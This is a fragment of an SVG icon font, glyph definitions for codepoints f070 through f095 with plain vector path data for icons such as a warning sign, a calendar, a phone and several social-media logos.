<glyph unicode="&#xf070;" horiz-adv-x="1792" d="M555 201l78 141q-87 63 -136 159t-49 203q0 121 61 225q-229 -117 -381 -353q167 -258 427 -375zM944 960q0 20 -14 34t-34 14q-125 0 -214.5 -89.5t-89.5 -214.5q0 -20 14 -34t34 -14t34 14t14 34q0 86 61 147t147 61q20 0 34 14t14 34zM1307 1151q0 -7 -1 -9 q-105 -188 -315 -566t-316 -567l-49 -89q-10 -16 -28 -16q-12 0 -134 70q-16 10 -16 28q0 12 44 87q-143 65 -263.5 173t-208.5 245q-20 31 -20 69t20 69q153 235 380 371t496 136q89 0 180 -17l54 97q10 16 28 16q5 0 18 -6t31 -15.5t33 -18.5t31.5 -18.5t19.5 -11.5 q16 -10 16 -27zM1344 704q0 -139 -79 -253.5t-209 -164.5l280 502q8 -45 8 -84zM1792 576q0 -35 -20 -69q-39 -64 -109 -145q-150 -172 -347.5 -267t-419.5 -95l74 132q212 18 392.5 137t301.5 307q-115 179 -282 294l63 112q95 -64 182.5 -153t144.5 -184q20 -34 20 -69z " />
<glyph unicode="&#xf071;" horiz-adv-x="1792" d="M1024 161v190q0 14 -9.5 23.5t-22.5 9.5h-192q-13 0 -22.5 -9.5t-9.5 -23.5v-190q0 -14 9.5 -23.5t22.5 -9.5h192q13 0 22.5 9.5t9.5 23.5zM1022 535l18 459q0 12 -10 19q-13 11 -24 11h-220q-11 0 -24 -11q-10 -7 -10 -21l17 -457q0 -10 10 -16.5t24 -6.5h185 q14 0 23.5 6.5t10.5 16.5zM1008 1469l768 -1408q35 -63 -2 -126q-17 -29 -46.5 -46t-63.5 -17h-1536q-34 0 -63.5 17t-46.5 46q-37 63 -2 126l768 1408q17 31 47 49t65 18t65 -18t47 -49z" />
<glyph unicode="&#xf072;" horiz-adv-x="1408" d="M1376 1376q44 -52 12 -148t-108 -172l-161 -161l160 -696q5 -19 -12 -33l-128 -96q-7 -6 -19 -6q-4 0 -7 1q-15 3 -21 16l-279 508l-259 -259l53 -194q5 -17 -8 -31l-96 -96q-9 -9 -23 -9h-2q-15 2 -24 13l-189 252l-252 189q-11 7 -13 23q-1 13 9 25l96 97q9 9 23 9 q6 0 8 -1l194 -53l259 259l-508 279q-14 8 -17 24q-2 16 9 27l128 128q14 13 30 8l665 -159l160 160q76 76 172 108t148 -12z" />
<glyph unicode="&#xf073;" horiz-adv-x="1664" d="M128 -128h288v288h-288v-288zM480 -128h320v288h-320v-288zM128 224h288v320h-288v-320zM480 224h320v320h-320v-320zM128 608h288v288h-288v-288zM864 -128h320v288h-320v-288zM480 608h320v288h-320v-288zM1248 -128h288v288h-288v-288zM864 224h320v320h-320v-320z M512 1088v288q0 13 -9.5 22.5t-22.5 9.5h-64q-13 0 -22.5 -9.5t-9.5 -22.5v-288q0 -13 9.5 -22.5t22.5 -9.5h64q13 0 22.5 9.5t9.5 22.5zM1248 224h288v320h-288v-320zM864 608h320v288h-320v-288zM1248 608h288v288h-288v-288zM1280 1088v288q0 13 -9.5 22.5t-22.5 9.5h-64 q-13 0 -22.5 -9.5t-9.5 -22.5v-288q0 -13 9.5 -22.5t22.5 -9.5h64q13 0 22.5 9.5t9.5 22.5zM1664 1152v-1280q0 -52 -38 -90t-90 -38h-1408q-52 0 -90 38t-38 90v1280q0 52 38 90t90 38h128v96q0 66 47 113t113 47h64q66 0 113 -47t47 -113v-96h384v96q0 66 47 113t113 47 h64q66 0 113 -47t47 -113v-96h128q52 0 90 -38t38 -90z" />
<glyph unicode="&#xf074;" horiz-adv-x="1792" d="M666 1055q-60 -92 -137 -273q-22 45 -37 72.5t-40.5 63.5t-51 56.5t-63 35t-81.5 14.5h-224q-14 0 -23 9t-9 23v192q0 14 9 23t23 9h224q250 0 410 -225zM1792 256q0 -14 -9 -23l-320 -320q-9 -9 -23 -9q-13 0 -22.5 9.5t-9.5 22.5v192q-32 0 -85 -0.5t-81 -1t-73 1 t-71 5t-64 10.5t-63 18.5t-58 28.5t-59 40t-55 53.5t-56 69.5q59 93 136 273q22 -45 37 -72.5t40.5 -63.5t51 -56.5t63 -35t81.5 -14.5h256v192q0 14 9 23t23 9q12 0 24 -10l319 -319q9 -9 9 -23zM1792 1152q0 -14 -9 -23l-320 -320q-9 -9 -23 -9q-13 0 -22.5 9.5t-9.5 22.5 v192h-256q-48 0 -87 -15t-69 -45t-51 -61.5t-45 -77.5q-32 -62 -78 -171q-29 -66 -49.5 -111t-54 -105t-64 -100t-74 -83t-90 -68.5t-106.5 -42t-128 -16.5h-224q-14 0 -23 9t-9 23v192q0 14 9 23t23 9h224q48 0 87 15t69 45t51 61.5t45 77.5q32 62 78 171q29 66 49.5 111 t54 105t64 100t74 83t90 68.5t106.5 42t128 16.5h256v192q0 14 9 23t23 9q12 0 24 -10l319 -319q9 -9 9 -23z" />
<glyph unicode="&#xf075;" horiz-adv-x="1792" d="M1792 640q0 -174 -120 -321.5t-326 -233t-450 -85.5q-70 0 -145 8q-198 -175 -460 -242q-49 -14 -114 -22q-17 -2 -30.5 9t-17.5 29v1q-3 4 -0.5 12t2 10t4.5 9.5l6 9t7 8.5t8 9q7 8 31 34.5t34.5 38t31 39.5t32.5 51t27 59t26 76q-157 89 -247.5 220t-90.5 281 q0 130 71 248.5t191 204.5t286 136.5t348 50.5q244 0 450 -85.5t326 -233t120 -321.5z" />
<glyph unicode="&#xf076;" d="M1536 704v-128q0 -201 -98.5 -362t-274 -251.5t-395.5 -90.5t-395.5 90.5t-274 251.5t-98.5 362v128q0 26 19 45t45 19h384q26 0 45 -19t19 -45v-128q0 -52 23.5 -90t53.5 -57t71 -30t64 -13t44 -2t44 2t64 13t71 30t53.5 57t23.5 90v128q0 26 19 45t45 19h384 q26 0 45 -19t19 -45zM512 1344v-384q0 -26 -19 -45t-45 -19h-384q-26 0 -45 19t-19 45v384q0 26 19 45t45 19h384q26 0 45 -19t19 -45zM1536 1344v-384q0 -26 -19 -45t-45 -19h-384q-26 0 -45 19t-19 45v384q0 26 19 45t45 19h384q26 0 45 -19t19 -45z" />
<glyph unicode="&#xf077;" horiz-adv-x="1792" d="M1683 205l-166 -165q-19 -19 -45 -19t-45 19l-531 531l-531 -531q-19 -19 -45 -19t-45 19l-166 165q-19 19 -19 45.5t19 45.5l742 741q19 19 45 19t45 -19l742 -741q19 -19 19 -45.5t-19 -45.5z" />
<glyph unicode="&#xf078;" horiz-adv-x="1792" d="M1683 728l-742 -741q-19 -19 -45 -19t-45 19l-742 741q-19 19 -19 45.5t19 45.5l166 165q19 19 45 19t45 -19l531 -531l531 531q19 19 45 19t45 -19l166 -165q19 -19 19 -45.5t-19 -45.5z" />
<glyph unicode="&#xf079;" horiz-adv-x="1920" d="M1280 32q0 -13 -9.5 -22.5t-22.5 -9.5h-960q-8 0 -13.5 2t-9 7t-5.5 8t-3 11.5t-1 11.5v13v11v160v416h-192q-26 0 -45 19t-19 45q0 24 15 41l320 384q19 22 49 22t49 -22l320 -384q15 -17 15 -41q0 -26 -19 -45t-45 -19h-192v-384h576q16 0 25 -11l160 -192q7 -11 7 -21 zM1920 448q0 -24 -15 -41l-320 -384q-20 -23 -49 -23t-49 23l-320 384q-15 17 -15 41q0 26 19 45t45 19h192v384h-576q-16 0 -25 12l-160 192q-7 9 -7 20q0 13 9.5 22.5t22.5 9.5h960q8 0 13.5 -2t9 -7t5.5 -8t3 -11.5t1 -11.5v-13v-11v-160v-416h192q26 0 45 -19t19 -45z " />
<glyph unicode="&#xf07a;" horiz-adv-x="1664" d="M640 0q0 -52 -38 -90t-90 -38t-90 38t-38 90t38 90t90 38t90 -38t38 -90zM1536 0q0 -52 -38 -90t-90 -38t-90 38t-38 90t38 90t90 38t90 -38t38 -90zM1664 1088v-512q0 -24 -16.5 -42.5t-40.5 -21.5l-1044 -122q13 -60 13 -70q0 -16 -24 -64h920q26 0 45 -19t19 -45 t-19 -45t-45 -19h-1024q-26 0 -45 19t-19 45q0 11 8 31.5t16 36t21.5 40t15.5 29.5l-177 823h-204q-26 0 -45 19t-19 45t19 45t45 19h256q16 0 28.5 -6.5t19.5 -15.5t13 -24.5t8 -26t5.5 -29.5t4.5 -26h1201q26 0 45 -19t19 -45z" />
<glyph unicode="&#xf07b;" horiz-adv-x="1664" d="M1664 928v-704q0 -92 -66 -158t-158 -66h-1216q-92 0 -158 66t-66 158v960q0 92 66 158t158 66h320q92 0 158 -66t66 -158v-32h672q92 0 158 -66t66 -158z" />
<glyph unicode="&#xf07c;" horiz-adv-x="1920" d="M1879 584q0 -31 -31 -66l-336 -396q-43 -51 -120.5 -86.5t-143.5 -35.5h-1088q-34 0 -60.5 13t-26.5 43q0 31 31 66l336 396q43 51 120.5 86.5t143.5 35.5h1088q34 0 60.5 -13t26.5 -43zM1536 928v-160h-832q-94 0 -197 -47.5t-164 -119.5l-337 -396l-5 -6q0 4 -0.5 12.5 t-0.5 12.5v960q0 92 66 158t158 66h320q92 0 158 -66t66 -158v-32h544q92 0 158 -66t66 -158z" />
<glyph unicode="&#xf07d;" horiz-adv-x="768" d="M704 1216q0 -26 -19 -45t-45 -19h-128v-1024h128q26 0 45 -19t19 -45t-19 -45l-256 -256q-19 -19 -45 -19t-45 19l-256 256q-19 19 -19 45t19 45t45 19h128v1024h-128q-26 0 -45 19t-19 45t19 45l256 256q19 19 45 19t45 -19l256 -256q19 -19 19 -45z" />
<glyph unicode="&#xf07e;" horiz-adv-x="1792" d="M1792 640q0 -26 -19 -45l-256 -256q-19 -19 -45 -19t-45 19t-19 45v128h-1024v-128q0 -26 -19 -45t-45 -19t-45 19l-256 256q-19 19 -19 45t19 45l256 256q19 19 45 19t45 -19t19 -45v-128h1024v128q0 26 19 45t45 19t45 -19l256 -256q19 -19 19 -45z" />
<glyph unicode="&#xf080;" horiz-adv-x="2048" d="M640 640v-512h-256v512h256zM1024 1152v-1024h-256v1024h256zM2048 0v-128h-2048v1536h128v-1408h1920zM1408 896v-768h-256v768h256zM1792 1280v-1152h-256v1152h256z" />
<glyph unicode="&#xf081;" d="M1280 926q-56 -25 -121 -34q68 40 93 117q-65 -38 -134 -51q-61 66 -153 66q-87 0 -148.5 -61.5t-61.5 -148.5q0 -29 5 -48q-129 7 -242 65t-192 155q-29 -50 -29 -106q0 -114 91 -175q-47 1 -100 26v-2q0 -75 50 -133.5t123 -72.5q-29 -8 -51 -8q-13 0 -39 4 q21 -63 74.5 -104t121.5 -42q-116 -90 -261 -90q-26 0 -50 3q148 -94 322 -94q112 0 210 35.5t168 95t120.5 137t75 162t24.5 168.5q0 18 -1 27q63 45 105 109zM1536 1120v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5 t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
<glyph unicode="&#xf082;" d="M1248 1408q119 0 203.5 -84.5t84.5 -203.5v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-188v595h199l30 232h-229v148q0 56 23.5 84t91.5 28l122 1v207q-63 9 -178 9q-136 0 -217.5 -80t-81.5 -226v-171h-200v-232h200v-595h-532q-119 0 -203.5 84.5t-84.5 203.5v960 q0 119 84.5 203.5t203.5 84.5h960z" />
<glyph unicode="&#xf083;" horiz-adv-x="1792" d="M928 704q0 14 -9 23t-23 9q-66 0 -113 -47t-47 -113q0 -14 9 -23t23 -9t23 9t9 23q0 40 28 68t68 28q14 0 23 9t9 23zM1152 574q0 -106 -75 -181t-181 -75t-181 75t-75 181t75 181t181 75t181 -75t75 -181zM128 0h1536v128h-1536v-128zM1280 574q0 159 -112.5 271.5 t-271.5 112.5t-271.5 -112.5t-112.5 -271.5t112.5 -271.5t271.5 -112.5t271.5 112.5t112.5 271.5zM256 1216h384v128h-384v-128zM128 1024h1536v118v138h-828l-64 -128h-644v-128zM1792 1280v-1280q0 -53 -37.5 -90.5t-90.5 -37.5h-1536q-53 0 -90.5 37.5t-37.5 90.5v1280 q0 53 37.5 90.5t90.5 37.5h1536q53 0 90.5 -37.5t37.5 -90.5z" />
<glyph unicode="&#xf084;" horiz-adv-x="1792" d="M832 1024q0 80 -56 136t-136 56t-136 -56t-56 -136q0 -42 19 -83q-41 19 -83 19q-80 0 -136 -56t-56 -136t56 -136t136 -56t136 56t56 136q0 42 -19 83q41 -19 83 -19q80 0 136 56t56 136zM1683 320q0 -17 -49 -66t-66 -49q-9 0 -28.5 16t-36.5 33t-38.5 40t-24.5 26 l-96 -96l220 -220q28 -28 28 -68q0 -42 -39 -81t-81 -39q-40 0 -68 28l-671 671q-176 -131 -365 -131q-163 0 -265.5 102.5t-102.5 265.5q0 160 95 313t248 248t313 95q163 0 265.5 -102.5t102.5 -265.5q0 -189 -131 -365l355 -355l96 96q-3 3 -26 24.5t-40 38.5t-33 36.5 t-16 28.5q0 17 49 66t66 49q13 0 23 -10q6 -6 46 -44.5t82 -79.5t86.5 -86t73 -78t28.5 -41z" />
<glyph unicode="&#xf085;" horiz-adv-x="1920" d="M896 640q0 106 -75 181t-181 75t-181 -75t-75 -181t75 -181t181 -75t181 75t75 181zM1664 128q0 52 -38 90t-90 38t-90 -38t-38 -90q0 -53 37.5 -90.5t90.5 -37.5t90.5 37.5t37.5 90.5zM1664 1152q0 52 -38 90t-90 38t-90 -38t-38 -90q0 -53 37.5 -90.5t90.5 -37.5 t90.5 37.5t37.5 90.5zM1280 731v-185q0 -10 -7 -19.5t-16 -10.5l-155 -24q-11 -35 -32 -76q34 -48 90 -115q7 -10 7 -20q0 -12 -7 -19q-23 -30 -82.5 -89.5t-78.5 -59.5q-11 0 -21 7l-115 90q-37 -19 -77 -31q-11 -108 -23 -155q-7 -24 -30 -24h-186q-11 0 -20 7.5t-10 17.5 l-23 153q-34 10 -75 31l-118 -89q-7 -7 -20 -7q-11 0 -21 8q-144 133 -144 160q0 9 7 19q10 14 41 53t47 61q-23 44 -35 82l-152 24q-10 1 -17 9.5t-7 19.5v185q0 10 7 19.5t16 10.5l155 24q11 35 32 76q-34 48 -90 115q-7 11 -7 20q0 12 7 20q22 30 82 89t79 59q11 0 21 -7 l115 -90q34 18 77 32q11 108 23 154q7 24 30 24h186q11 0 20 -7.5t10 -17.5l23 -153q34 -10 75 -31l118 89q8 7 20 7q11 0 21 -8q144 -133 144 -160q0 -9 -7 -19q-12 -16 -42 -54t-45 -60q23 -48 34 -82l152 -23q10 -2 17 -10.5t7 -19.5zM1920 198v-140q0 -16 -149 -31 q-12 -27 -30 -52q51 -113 51 -138q0 -4 -4 -7q-122 -71 -124 -71q-8 0 -46 47t-52 68q-20 -2 -30 -2t-30 2q-14 -21 -52 -68t-46 -47q-2 0 -124 71q-4 3 -4 7q0 25 51 138q-18 25 -30 52q-149 15 -149 31v140q0 16 149 31q13 29 30 52q-51 113 -51 138q0 4 4 7q4 2 35 20 t59 34t30 16q8 0 46 -46.5t52 -67.5q20 2 30 2t30 -2q51 71 92 112l6 2q4 0 124 -70q4 -3 4 -7q0 -25 -51 -138q17 -23 30 -52q149 -15 149 -31zM1920 1222v-140q0 -16 -149 -31q-12 -27 -30 -52q51 -113 51 -138q0 -4 -4 -7q-122 -71 -124 -71q-8 0 -46 47t-52 68 q-20 -2 -30 -2t-30 2q-14 -21 -52 -68t-46 -47q-2 0 -124 71q-4 3 -4 7q0 25 51 138q-18 25 -30 52q-149 15 -149 31v140q0 16 149 31q13 29 30 52q-51 113 -51 138q0 4 4 7q4 2 35 20t59 34t30 16q8 0 46 -46.5t52 -67.5q20 2 30 2t30 -2q51 71 92 112l6 2q4 0 124 -70 q4 -3 4 -7q0 -25 -51 -138q17 -23 30 -52q149 -15 149 -31z" />
<glyph unicode="&#xf086;" horiz-adv-x="1792" d="M1408 768q0 -139 -94 -257t-256.5 -186.5t-353.5 -68.5q-86 0 -176 16q-124 -88 -278 -128q-36 -9 -86 -16h-3q-11 0 -20.5 8t-11.5 21q-1 3 -1 6.5t0.5 6.5t2 6l2.5 5t3.5 5.5t4 5t4.5 5t4 4.5q5 6 23 25t26 29.5t22.5 29t25 38.5t20.5 44q-124 72 -195 177t-71 224 q0 139 94 257t256.5 186.5t353.5 68.5t353.5 -68.5t256.5 -186.5t94 -257zM1792 512q0 -120 -71 -224.5t-195 -176.5q10 -24 20.5 -44t25 -38.5t22.5 -29t26 -29.5t23 -25q1 -1 4 -4.5t4.5 -5t4 -5t3.5 -5.5l2.5 -5t2 -6t0.5 -6.5t-1 -6.5q-3 -14 -13 -22t-22 -7 q-50 7 -86 16q-154 40 -278 128q-90 -16 -176 -16q-271 0 -472 132q58 -4 88 -4q161 0 309 45t264 129q125 92 192 212t67 254q0 77 -23 152q129 -71 204 -178t75 -230z" />
<glyph unicode="&#xf087;" d="M256 192q0 26 -19 45t-45 19t-45 -19t-19 -45t19 -45t45 -19t45 19t19 45zM1408 768q0 51 -39 89.5t-89 38.5h-352q0 58 48 159.5t48 160.5q0 98 -32 145t-128 47q-26 -26 -38 -85t-30.5 -125.5t-59.5 -109.5q-22 -23 -77 -91q-4 -5 -23 -30t-31.5 -41t-34.5 -42.5 t-40 -44t-38.5 -35.5t-40 -27t-35.5 -9h-32v-640h32q13 0 31.5 -3t33 -6.5t38 -11t35 -11.5t35.5 -12.5t29 -10.5q211 -73 342 -73h121q192 0 192 167q0 26 -5 56q30 16 47.5 52.5t17.5 73.5t-18 69q53 50 53 119q0 25 -10 55.5t-25 47.5q32 1 53.5 47t21.5 81zM1536 769 q0 -89 -49 -163q9 -33 9 -69q0 -77 -38 -144q3 -21 3 -43q0 -101 -60 -178q1 -139 -85 -219.5t-227 -80.5h-36h-93q-96 0 -189.5 22.5t-216.5 65.5q-116 40 -138 40h-288q-53 0 -90.5 37.5t-37.5 90.5v640q0 53 37.5 90.5t90.5 37.5h274q36 24 137 155q58 75 107 128 q24 25 35.5 85.5t30.5 126.5t62 108q39 37 90 37q84 0 151 -32.5t102 -101.5t35 -186q0 -93 -48 -192h176q104 0 180 -76t76 -179z" />
<glyph unicode="&#xf088;" d="M256 1088q0 26 -19 45t-45 19t-45 -19t-19 -45t19 -45t45 -19t45 19t19 45zM1408 512q0 35 -21.5 81t-53.5 47q15 17 25 47.5t10 55.5q0 69 -53 119q18 32 18 69t-17.5 73.5t-47.5 52.5q5 30 5 56q0 85 -49 126t-136 41h-128q-131 0 -342 -73q-5 -2 -29 -10.5 t-35.5 -12.5t-35 -11.5t-38 -11t-33 -6.5t-31.5 -3h-32v-640h32q16 0 35.5 -9t40 -27t38.5 -35.5t40 -44t34.5 -42.5t31.5 -41t23 -30q55 -68 77 -91q41 -43 59.5 -109.5t30.5 -125.5t38 -85q96 0 128 47t32 145q0 59 -48 160.5t-48 159.5h352q50 0 89 38.5t39 89.5z M1536 511q0 -103 -76 -179t-180 -76h-176q48 -99 48 -192q0 -118 -35 -186q-35 -69 -102 -101.5t-151 -32.5q-51 0 -90 37q-34 33 -54 82t-25.5 90.5t-17.5 84.5t-31 64q-48 50 -107 127q-101 131 -137 155h-274q-53 0 -90.5 37.5t-37.5 90.5v640q0 53 37.5 90.5t90.5 37.5 h288q22 0 138 40q128 44 223 66t200 22h112q140 0 226.5 -79t85.5 -216v-5q60 -77 60 -178q0 -22 -3 -43q38 -67 38 -144q0 -36 -9 -69q49 -74 49 -163z" />
<glyph unicode="&#xf089;" horiz-adv-x="896" d="M832 1504v-1339l-449 -236q-22 -12 -40 -12q-21 0 -31.5 14.5t-10.5 35.5q0 6 2 20l86 500l-364 354q-25 27 -25 48q0 37 56 46l502 73l225 455q19 41 49 41z" />
<glyph unicode="&#xf08a;" horiz-adv-x="1792" d="M1664 940q0 81 -21.5 143t-55 98.5t-81.5 59.5t-94 31t-98 8t-112 -25.5t-110.5 -64t-86.5 -72t-60 -61.5q-18 -22 -49 -22t-49 22q-24 28 -60 61.5t-86.5 72t-110.5 64t-112 25.5t-98 -8t-94 -31t-81.5 -59.5t-55 -98.5t-21.5 -143q0 -168 187 -355l581 -560l580 559 q188 188 188 356zM1792 940q0 -221 -229 -450l-623 -600q-18 -18 -44 -18t-44 18l-624 602q-10 8 -27.5 26t-55.5 65.5t-68 97.5t-53.5 121t-23.5 138q0 220 127 344t351 124q62 0 126.5 -21.5t120 -58t95.5 -68.5t76 -68q36 36 76 68t95.5 68.5t120 58t126.5 21.5 q224 0 351 -124t127 -344z" />
<glyph unicode="&#xf08b;" horiz-adv-x="1664" d="M640 96q0 -4 1 -20t0.5 -26.5t-3 -23.5t-10 -19.5t-20.5 -6.5h-320q-119 0 -203.5 84.5t-84.5 203.5v704q0 119 84.5 203.5t203.5 84.5h320q13 0 22.5 -9.5t9.5 -22.5q0 -4 1 -20t0.5 -26.5t-3 -23.5t-10 -19.5t-20.5 -6.5h-320q-66 0 -113 -47t-47 -113v-704 q0 -66 47 -113t113 -47h288h11h13t11.5 -1t11.5 -3t8 -5.5t7 -9t2 -13.5zM1568 640q0 -26 -19 -45l-544 -544q-19 -19 -45 -19t-45 19t-19 45v288h-448q-26 0 -45 19t-19 45v384q0 26 19 45t45 19h448v288q0 26 19 45t45 19t45 -19l544 -544q19 -19 19 -45z" />
<glyph unicode="&#xf08c;" d="M237 122h231v694h-231v-694zM483 1030q-1 52 -36 86t-93 34t-94.5 -34t-36.5 -86q0 -51 35.5 -85.5t92.5 -34.5h1q59 0 95 34.5t36 85.5zM1068 122h231v398q0 154 -73 233t-193 79q-136 0 -209 -117h2v101h-231q3 -66 0 -694h231v388q0 38 7 56q15 35 45 59.5t74 24.5 q116 0 116 -157v-371zM1536 1120v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
<glyph unicode="&#xf08d;" horiz-adv-x="1152" d="M480 672v448q0 14 -9 23t-23 9t-23 -9t-9 -23v-448q0 -14 9 -23t23 -9t23 9t9 23zM1152 320q0 -26 -19 -45t-45 -19h-429l-51 -483q-2 -12 -10.5 -20.5t-20.5 -8.5h-1q-27 0 -32 27l-76 485h-404q-26 0 -45 19t-19 45q0 123 78.5 221.5t177.5 98.5v512q-52 0 -90 38 t-38 90t38 90t90 38h640q52 0 90 -38t38 -90t-38 -90t-90 -38v-512q99 0 177.5 -98.5t78.5 -221.5z" />
<glyph unicode="&#xf08e;" horiz-adv-x="1792" d="M1408 608v-320q0 -119 -84.5 -203.5t-203.5 -84.5h-832q-119 0 -203.5 84.5t-84.5 203.5v832q0 119 84.5 203.5t203.5 84.5h704q14 0 23 -9t9 -23v-64q0 -14 -9 -23t-23 -9h-704q-66 0 -113 -47t-47 -113v-832q0 -66 47 -113t113 -47h832q66 0 113 47t47 113v320 q0 14 9 23t23 9h64q14 0 23 -9t9 -23zM1792 1472v-512q0 -26 -19 -45t-45 -19t-45 19l-176 176l-652 -652q-10 -10 -23 -10t-23 10l-114 114q-10 10 -10 23t10 23l652 652l-176 176q-19 19 -19 45t19 45t45 19h512q26 0 45 -19t19 -45z" />
<glyph unicode="&#xf090;" d="M1184 640q0 -26 -19 -45l-544 -544q-19 -19 -45 -19t-45 19t-19 45v288h-448q-26 0 -45 19t-19 45v384q0 26 19 45t45 19h448v288q0 26 19 45t45 19t45 -19l544 -544q19 -19 19 -45zM1536 992v-704q0 -119 -84.5 -203.5t-203.5 -84.5h-320q-13 0 -22.5 9.5t-9.5 22.5 q0 4 -1 20t-0.5 26.5t3 23.5t10 19.5t20.5 6.5h320q66 0 113 47t47 113v704q0 66 -47 113t-113 47h-288h-11h-13t-11.5 1t-11.5 3t-8 5.5t-7 9t-2 13.5q0 4 -1 20t-0.5 26.5t3 23.5t10 19.5t20.5 6.5h320q119 0 203.5 -84.5t84.5 -203.5z" />
<glyph unicode="&#xf091;" horiz-adv-x="1664" d="M458 653q-74 162 -74 371h-256v-96q0 -78 94.5 -162t235.5 -113zM1536 928v96h-256q0 -209 -74 -371q141 29 235.5 113t94.5 162zM1664 1056v-128q0 -71 -41.5 -143t-112 -130t-173 -97.5t-215.5 -44.5q-42 -54 -95 -95q-38 -34 -52.5 -72.5t-14.5 -89.5q0 -54 30.5 -91 t97.5 -37q75 0 133.5 -45.5t58.5 -114.5v-64q0 -14 -9 -23t-23 -9h-832q-14 0 -23 9t-9 23v64q0 69 58.5 114.5t133.5 45.5q67 0 97.5 37t30.5 91q0 51 -14.5 89.5t-52.5 72.5q-53 41 -95 95q-113 5 -215.5 44.5t-173 97.5t-112 130t-41.5 143v128q0 40 28 68t68 28h288v96 q0 66 47 113t113 47h576q66 0 113 -47t47 -113v-96h288q40 0 68 -28t28 -68z" />
<glyph unicode="&#xf092;" d="M394 184q-8 -9 -20 3q-13 11 -4 19q8 9 20 -3q12 -11 4 -19zM352 245q9 -12 0 -19q-8 -6 -17 7t0 18q9 7 17 -6zM291 305q-5 -7 -13 -2q-10 5 -7 12q3 5 13 2q10 -5 7 -12zM322 271q-6 -7 -16 3q-9 11 -2 16q6 6 16 -3q9 -11 2 -16zM451 159q-4 -12 -19 -6q-17 4 -13 15 t19 7q16 -5 13 -16zM514 154q0 -11 -16 -11q-17 -2 -17 11q0 11 16 11q17 2 17 -11zM572 164q2 -10 -14 -14t-18 8t14 15q16 2 18 -9zM1536 1120v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-224q-16 0 -24.5 1t-19.5 5t-16 14.5t-5 27.5v239q0 97 -52 142q57 6 102.5 18t94 39 t81 66.5t53 105t20.5 150.5q0 121 -79 206q37 91 -8 204q-28 9 -81 -11t-92 -44l-38 -24q-93 26 -192 26t-192 -26q-16 11 -42.5 27t-83.5 38.5t-86 13.5q-44 -113 -7 -204q-79 -85 -79 -206q0 -85 20.5 -150t52.5 -105t80.5 -67t94 -39t102.5 -18q-40 -36 -49 -103 q-21 -10 -45 -15t-57 -5t-65.5 21.5t-55.5 62.5q-19 32 -48.5 52t-49.5 24l-20 3q-21 0 -29 -4.5t-5 -11.5t9 -14t13 -12l7 -5q22 -10 43.5 -38t31.5 -51l10 -23q13 -38 44 -61.5t67 -30t69.5 -7t55.5 3.5l23 4q0 -38 0.5 -103t0.5 -68q0 -22 -11 -33.5t-22 -13t-33 -1.5 h-224q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
<glyph unicode="&#xf093;" horiz-adv-x="1664" d="M1280 64q0 26 -19 45t-45 19t-45 -19t-19 -45t19 -45t45 -19t45 19t19 45zM1536 64q0 26 -19 45t-45 19t-45 -19t-19 -45t19 -45t45 -19t45 19t19 45zM1664 288v-320q0 -40 -28 -68t-68 -28h-1472q-40 0 -68 28t-28 68v320q0 40 28 68t68 28h427q21 -56 70.5 -92 t110.5 -36h256q61 0 110.5 36t70.5 92h427q40 0 68 -28t28 -68zM1339 936q-17 -40 -59 -40h-256v-448q0 -26 -19 -45t-45 -19h-256q-26 0 -45 19t-19 45v448h-256q-42 0 -59 40q-17 39 14 69l448 448q18 19 45 19t45 -19l448 -448q31 -30 14 -69z" />
<glyph unicode="&#xf094;" d="M1407 710q0 44 -7 113.5t-18 96.5q-12 30 -17 44t-9 36.5t-4 48.5q0 23 5 68.5t5 67.5q0 37 -10 55q-4 1 -13 1q-19 0 -58 -4.5t-59 -4.5q-60 0 -176 24t-175 24q-43 0 -94.5 -11.5t-85 -23.5t-89.5 -34q-137 -54 -202 -103q-96 -73 -159.5 -189.5t-88 -236t-24.5 -248.5 q0 -40 12.5 -120t12.5 -121q0 -23 -11 -66.5t-11 -65.5t12 -36.5t34 -14.5q24 0 72.5 11t73.5 11q57 0 169.5 -15.5t169.5 -15.5q181 0 284 36q129 45 235.5 152.5t166 245.5t59.5 275zM1535 712q0 -165 -70 -327.5t-196 -288t-281 -180.5q-124 -44 -326 -44 q-57 0 -170 14.5t-169 14.5q-24 0 -72.5 -14.5t-73.5 -14.5q-73 0 -123.5 55.5t-50.5 128.5q0 24 11 68t11 67q0 40 -12.5 120.5t-12.5 121.5q0 111 18 217.5t54.5 209.5t100.5 194t150 156q78 59 232 120q194 78 316 78q60 0 175.5 -24t173.5 -24q19 0 57 5t58 5 q81 0 118 -50.5t37 -134.5q0 -23 -5 -68t-5 -68q0 -10 1 -18.5t3 -17t4 -13.5t6.5 -16t6.5 -17q16 -40 25 -118.5t9 -136.5z" />
<glyph unicode="&#xf095;" horiz-adv-x="1408" d="M1408 296q0 -27 -10 -70.5t-21 -68.5q-21 -50 -122 -106q-94 -51 -186 -51q-27 0 -52.5 3.5t-57.5 12.5t-47.5 14.5t-55.5 20.5t-49 18q-98 35 -175 83q-128 79 -264.5 215.5t-215.5 264.5q-48 77 -83 175q-3 9 -18 49t-20.5 55.5t-14.5 47.5t-12.5 57.5t-3.5 52.5 q0 92 51 186q56 101 106 122q25 11 68.5 21t70.5 10q14 0 21 -3q18 -6 53 -76q11 -19 30 -54t35 -63.5t31 -53.5q3 -4 17.5 -25t21.5 -35.5t7 -28.5q0 -20 -28.5 -50t-62 -55t-62 -53t-28.5 -46q0 -9 5 -22.5t8.5 -20.5t14 -24t11.5 -19q76 -137 174 -235t235 -174 q2 -1 19 -11.5t24 -14t20.5 -8.5t22.5 -5q18 0 46 28.5t53 62t55 62t50 28.5q14 0 28.5 -7t35.5 -21.5t25 -17.5q25 -15 53.5 -31t63.5 -35t54 -30q70 -35 76 -53q3 -7 3 -21z" />
